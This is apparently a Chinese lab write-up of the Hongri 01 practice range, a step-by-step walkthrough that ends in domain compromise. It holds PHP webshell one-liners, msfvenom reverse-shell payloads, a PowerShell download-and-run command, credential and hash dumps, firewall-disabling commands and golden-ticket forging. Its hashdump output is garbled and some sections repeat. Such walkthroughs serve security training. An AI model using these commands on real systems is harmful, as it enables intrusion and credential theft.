当前位置:首页 » 《随便一记》 » 正文

《关于我不自量力挑战红日靶场01却被虐的不成人样的那档事》_葵gui的博客

28 人参与  2022年02月21日 12:17  分类 : 《随便一记》  评论

点击全文阅读


文章目录

  • 红日靶场01
      • O、 环境搭建
        • 拓扑图
      • 一、 vm1
        • 1. 信息收集
        • 0. `phpStudy` 探针
        • 1. 端口扫描
        • 2. 目录扫描
        • 3. 网站源码寻找信息
          • 1)进后台方法一
          • 2)进后台方法二(失败)
        • 4. `getshell`
          • 方法一:后台模板插马
          • 方法二:`phpmyadmin`
          • 1. outfile
          • 2. 日志写马
        • 5. 建立msf会话
        • 6. 爆破hash
        • 7. 远程桌面连接
      • 二、 收集域内信息
        • 1. 建立路由,配置代理
        • 2. 内网扫描
          • 0)收集跳板机信息
          • 1)主机探活
        • 3. 端口扫描
        • 4. 脚本扫描
      • 三、兰德里的折磨(失败的尝试)
        • 1. 永恒之蓝
        • 2. 域hash传递攻击
      • 四、 苦尽甘来
        • 1. 远程桌面连接
        • 2. 传马建立MSF连接
      • 五、 制作黄金票据

红日靶场01

O、 环境搭建

拓扑图

kali 	192.168.150.128
vm1  	192.168.52.143  192.168.150.152
vm2 	192.168.52.141
vm3(域控)		192.168.52.138	

可以参考 红日靶场配置

一、 vm1

1. 信息收集

0. phpStudy 探针

1. 端口扫描

nmap 192.168.150.152 -sT -Pn

https://z3.ax1x.com/2021/09/28/4fHIqU.png

80 web服务

https://z3.ax1x.com/2021/09/28/4fHzqO.png

2. 目录扫描

dirsearch.py

在这里插入图片描述

发现phpmyadmin

在这里插入图片描述

此处存在 弱口令 root root ,可尝试写马

不知道为什么用 BP 爆破root的返回包和错误密码结果一样

在这里插入图片描述

此处还有其实 beifen.rar 奈何信息收集能力太弱

在这里插入图片描述

访问http://192.168.150.152/beifen.rar

下载网站备份

3. 网站源码寻找信息

网站路径一清二楚码

在这里插入图片描述

访问验证,存在,点击登录

在这里插入图片描述

根据源码显示,访问后台

在这里插入图片描述

在这里插入图片描述

寻找数据库文件(找账号密码)

发现配置文件

在这里插入图片描述

1)进后台方法一

在网站首页的公告存在默认账号密码

在这里插入图片描述

进入后台

2)进后台方法二(失败)

发现可疑账号密码

在这里插入图片描述

寻找后台登录函数,密码加密函数

在这里插入图片描述

好像不可逆qwq

在这里插入图片描述

4. getshell

方法一:后台模板插马

百度搜索yxcms相关漏洞

在这里插入图片描述

插入一句话木马

<?php @eval($_POST['cmd']);?>

在这里插入图片描述

菜刀连接

在这里插入图片描述

方法二:phpmyadmin
1. outfile

找绝对路径

查看数据库路径

show global variables like "%datadir%";

C:\phpStudy\MySQL\data\

在浏览器查看路径时发现含有绝对路径报错

在这里插入图片描述

select '<?php @eval($_POST[1])?>' into outfile 'C:\phpStudy\WWW\yxcms\web.php'

--secure-file-priv选项无法写入

2. 日志写马

select user();

查看日志配置

show variables like 'general%';

在这里插入图片描述

来到变量处,修改general loggeneral log file 的值

set global general_log="ON"; 
set global general_log_file="C:/phpStudy/WWW/shell.php"

配置修改成功

在这里插入图片描述

一句话木马会被记录在日志中,从而getshell

select "<?php @eval($_POST['cmd']);?>";

在这里插入图片描述

在这里插入图片描述

5. 建立msf会话

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.150.128 lport=2223 -f exe > /root/shell.exe

上传

在这里插入图片描述

运行 shell.exe

在这里插入图片描述

成功建立

在这里插入图片描述

6. 爆破hash

迁移进程 migrate

加载 mimikatz, load mimikatz

load kiwi

creds_all 列举所有凭据

creds_kerberos 列举所有kerberos凭据

meterpreter > creds_kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================

Username       Domain   Password
--------       ------   --------
(null)         (null)   (null)
Administrator  GOD.ORG  !@#QWE123
stu1$          GOD.ORG  d1 28 eb 7d 4e 3d a9 f9 45 1d dd b8 11 4f ac 62 e0 72 bd fc e7 9d 31 e6 c5 d1 3f 97 f8 47 ca ed 31 85 02 17 b4 58 52 be 3e 73 72 fd cf 8b af 9c 15 7c 92 7a 3d dc 1c fd 24 8f 50 aa 3a ed ce 58 8f 39 8a a9 4e 67 68 0c c3 f8 b1 ae 91 45 83 07 be 30 e7 45 5c 68 54 fa 28 5a 8c da 54 5e 44 a7 57 ee bf 83 55 fd 6a cd 74 f6 d7 f9 4f 7a 37 1c 25 31 bd f0 0f ca 09 13 e7 56 5c 14 7c f8 03 25 03 49 93 d0 06 ea 47 4c 06 f2 d3 4a 48 46 c2 75 3f 79 08 64 a1 7c 23 f6 7b 81 1f e2 91 20 97 1a a6 b3 b0 3c c9 f5 62 9c 05 47 9a aa a3 0d 44 57 7e 0f 22 6f a7 f6 56 3f ea 21 00 7e 19 87 e1 57 9d 37 c0 f8 96 60 25 c1 f3 b9 ce 9b 8c 5f de 90 61 1c 3b f7 2a d5 1d 81 cc 98 95 60 73 a0 fe be ba a4 17 4e bf e7 5b 26 2b 06 61 9a b7 8e a9 e7

存在域GOD.ORG

Administrator !@#QWE123

上传mimikatz

kerberos::list

mimikatz # kerberos::list

[00000000] - 0x00000017 - rc4_hmac_nt
Start/End/MaxRenew: 2021/9/29 17:27:43 ; 2021/9/30 3:09:40 ; 2021/10/6 17:09:40
Server Name : krbtgt/GOD.ORG @ GOD.ORG
Client Name : stu1$ @ GOD.ORG
Flags 60a00000 : pre_authent ; renewable ; forwarded ; forwardable ;

[00000001] - 0x00000017 - rc4_hmac_nt
Start/End/MaxRenew: 2021/9/29 17:09:40 ; 2021/9/30 3:09:40 ; 2021/10/6 17:09:40
Server Name : krbtgt/GOD.ORG @ GOD.ORG
Client Name : stu1$ @ GOD.ORG
Flags 40e00000 : pre_authent ; initial ; renewable ; forwardable ;

[00000002] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 2021/9/29 17:20:17 ; 2021/9/30 3:09:40 ; 2021/10/6 17:09:40
Server Name : cifs/owa.god.org @ GOD.ORG
Client Name : stu1$ @ GOD.ORG
Flags 40a40000 : ok_as_delegate ; pre_authent ; renewable ; forwardable ;

[00000003] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 2021/9/29 17:09:40 ; 2021/9/30 3:09:40 ; 2021/10/6 17:09:40
Server Name : ldap/owa.god.org/god.org @ GOD.ORG
Client Name : stu1$ @ GOD.ORG
Flags 40a40000 : ok_as_delegate ; pre_authent ; renewable ; forwardable ;

[00000004] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 2021/9/27 20:13:31 ; 2021/9/28 6:03:09 ; 2021/10/4 20:03:09
Server Name : ldap/owa.god.org @ GOD.ORG
Client Name : stu1$ @ GOD.ORG
Flags 40a40000 : ok_as_delegate ; pre_authent ; renewable ; forwardable ;

[00000005] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 2021/9/27 20:03:16 ; 2021/9/28 6:03:09 ; 2021/10/4 20:03:09
Server Name : STU1$ @ GOD.ORG
Client Name : stu1$ @ GOD.ORG
Flags 40a00000 : pre_authent ; renewable ; forwardable ;

sid

C:\Windows\system32>whoami/user
whoami/user
================= =============================================
god\administrator S-1-5-21-2952760202-1353902439-2381784089-500

7. 远程桌面连接

run post/windows/manage/enable_rdp

在这里插入图片描述

rdesktop 192.168.150.152

在这里插入图片描述

进去 关闭防火墙 和 defender

二、 收集域内信息

1. 建立路由,配置代理

建立路由

run autoroute -s 192.168.52.0

查看

run autoroute -p

在这里插入图片描述

配置代理

在这里插入图片描述

修改 配置文件proxychains4.conf

坑:

└─# proxychains nmap 192.168.52.143 -sT 134 ⨯
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-29 10:30 CST
nmap: netutil.cc:1319: int collect_dnet_interfaces(const intf_entry*, void*): Assertion `rc == 0’ failed.
zsh: abort proxychains nmap 192.168.52.143 -sT

解决方法:

在 proxychains4.conf 中关闭dns代理

即 在proxydns 前加#

2. 内网扫描

0)收集跳板机信息

查看安装应用

run post/windows/gather/enum_applications 

在这里插入图片描述

列举当前登陆过的用户

 run post/windows/gather/enum_logged_on_users

在这里插入图片描述

定位域控

run post/windows/gather/enum_domain 

在这里插入图片描述

域内所有机器

run post/windows/gather/enum_ad_computers  

在这里插入图片描述

1)主机探活
use auxiliary/scanner/netbios/nbname
set rhosts 192.168.52.0/24
set threads 30
run

在这里插入图片描述

可以在shell中用 ping扫描探测主机存活

for /l %i in (1,1,255) do @ping 192.168.52.%i -w 1 -n 1|find /i "ttl="

在这里插入图片描述

proxychains nbtscan -r 192.168.52.0/24

在这里插入图片描述

进入shell查看域控主机

nltest /dsgetdc:GOD

在这里插入图片描述

VM2: 192.168.52.143

DC: 192.168.52.141

3. 端口扫描

proxychains nmap 192.168.52.143 -sT -Pn   

在这里插入图片描述

psexec.exe \\192.168.52.141 -u god\administrator -p !@#QWE123 cmd

4. 脚本扫描

可在 win7 的远程桌面执行
扫描是否存在常规漏洞

nmap --script==vuln 192.168.52.138

三、兰德里的折磨(失败的尝试)

1. 永恒之蓝

auxiliary/scanner/smb/smb_ms17_010

在这里插入图片描述

在这里插入图片描述

淦淦看

exploit/windows/smb/ms17_010_eternalblue

只设置rhostsrun

Exploit completed, but no session was created.

设置 SMBDomain, SMBUser , SMBpass

Exploit completed, but no session was created.

还把session Died

嗯…热带风味

在这里插入图片描述

利用 ms17_010_command 关闭防火墙

尝试 exploit/windows/smb/ms17_010_psexec

Exploit completed, but no session was created

session Died + 1

MS08-067 失败

scanner/smb/smb_login)

设置 SMBDomain, SMBUser , SMBpass

Exploit completed, but no session was created.

windows/dcerpc/ms03_026_dcom 失败

2. 域hash传递攻击

上传pexec.exewin7

psexec.exe \\192.168.52.141 -u god\administrator -p !@#QWE123 cmd

报错记得开启(需要重启)

在这里插入图片描述

在这里插入图片描述

exploit/windows/smb/ms17_010_psexec

添加rhostsrun

Exploit completed, but no session was created.

设置 SMBDomain, SMBUser , SMBpass

Exploit completed, but no session was created.

session Died + 1

在这里插入图片描述

四、 苦尽甘来

发现 ms17_010_command 能成功执行

在这里插入图片描述

1. 远程桌面连接

关闭防火墙

netsh firewall set opmode disable"

在这里插入图片描述

防火墙添加规则 开放3389(可跳过这一步直接开启远程桌面)

netsh advfirewall firewall add rule name="Open 3389" dir=in action=allow protocol=TCP localport=3389

在这里插入图片描述

尝试关闭防火墙或添加规则,(有时候)Died

开启远程桌面连接

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
set command wmic RDTOGGLE WHERE ServerName=\'%COMPUTERNAME%\' call SetAllowTSConnections 1
//设置时特殊字符需要转义

在这里插入图片描述

在这里插入图片描述

2. 传马建立MSF连接

在win7中上传正向马到网站目录下

msfvenom -p windows/meterpreter/bind_tcp lport=13777 -f exe > /root/d.exe

利用ms17_010_command 的远程命令执行漏洞

尝试 用cmd命令下载 d.exe (特殊字符需要转义)

powershell (new-object Net.WebClient).DownloadFile(\'http://192.168.52.143/yxcms/d.exe\',\'C:\\1.exe\')

在这里插入图片描述

正向连接

cmd 运行 木马

成功连接

在这里插入图片描述

在这里插入图片描述

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e7114141b0337bdce1aedf5594706205:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:58e91a5ac358d86513ab224312314061:::
liukaifeng01:1000:aad3b435b51404eeaad3b435b51404ee:e7114141b0337bdce1aedf5594706205:::
ligang:1106:aad3b435b51404eeaad3b435b51404ee:1e3d22f88dfd250c9312d21686c60f41:::
OWA : 1001 : a a d 3 b 435 b 51404 e e a a d 3 b 435 b 51404 e e : 10 a d 10 a b 6 e 0 b 77 f e 984 d 8 c 26 c 24 d a f 99 : : : R O O T − T V I 862 U B E H :1001:aad3b435b51404eeaad3b435b51404ee:10ad10ab6e0b77fe984d8c26c24daf99::: ROOT-TVI862UBEH :1001:aad3b435b51404eeaad3b435b51404ee:10ad10ab6e0b77fe984d8c26c24daf99:::ROOTTVI862UBEH:1104:aad3b435b51404eeaad3b435b51404ee:ba204b87ef6afa59677cb033b7f9e98f:::
STU1 : 1105 : a a d 3 b 435 b 51404 e e a a d 3 b 435 b 51404 e e : c 277 d c 0 a 07323 b e e 138 f b 6 c 5 c 859 b 823 : : : D E V 1 :1105:aad3b435b51404eeaad3b435b51404ee:c277dc0a07323bee138fb6c5c859b823::: DEV1 :1105:aad3b435b51404eeaad3b435b51404ee:c277dc0a07323bee138fb6c5c859b823:::DEV1:1107:aad3b435b51404eeaad3b435b51404ee:bed18e5b9d13bb384a3041a10d43c01b:::

五、 制作黄金票据

黄金票据的条件要求:
1.域名称 hacker.com
2.域的SID 值 S-1-5-21-1854149318-4101476522-1845767379
3.域的KRBTGT账户NTLM密码哈希或者aes-256值
0028977ae726d766b150520dc63df9b4
4.伪造用户名 administrator

进入dc 会话

迁移进程 加载mimikatzkiwi

窃取管理员权限

steal_token pid

执行命令获取制作黄金票据所需信息(sys权限无法执行改命令)

dcsync_ntlm krbtgt

meterpreter > dcsync_ntlm krbtgt
[+] Account : krbtgt
[+] NTLM Hash : 58e91a5ac358d86513ab224312314061
[+] LM Hash : a151f0fbafab56da67864278a60a75e8
[+] SID : S-1-5-21-2952760202-1353902439-2381784089-502
[+] RID : 502

dc 会话中制作黄金票据

golden_ticket_create -d god.org -u gui -s S-1-5-21-2952760202-1353902439-2381784089 -k 58e91a5ac358d86513ab224312314061 -t /home/kali/Desktop/hongri.ticket

进入win7会话

win7 无法访问 dc

在这里插入图片描述

sessions 中加载黄金票据

kerberos_ticket_use /home/kali/Desktop/hongri.ticket

进入 shell 再次访问

在这里插入图片描述

进入win7会话

win7 无法访问 dc

在这里插入图片描述

sessions 中加载黄金票据

kerberos_ticket_use /home/kali/Desktop/hongri.ticket

进入 shell 再次访问

在这里插入图片描述


点击全文阅读


本文链接:http://m.zhangshiyu.com/post/35084.html

连接  票据  后台  
<< 上一篇 下一篇 >>

  • 评论(0)
  • 赞助本站

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

关于我们 | 我要投稿 | 免责申明

Copyright © 2020-2022 ZhangShiYu.com Rights Reserved.豫ICP备2022013469号-1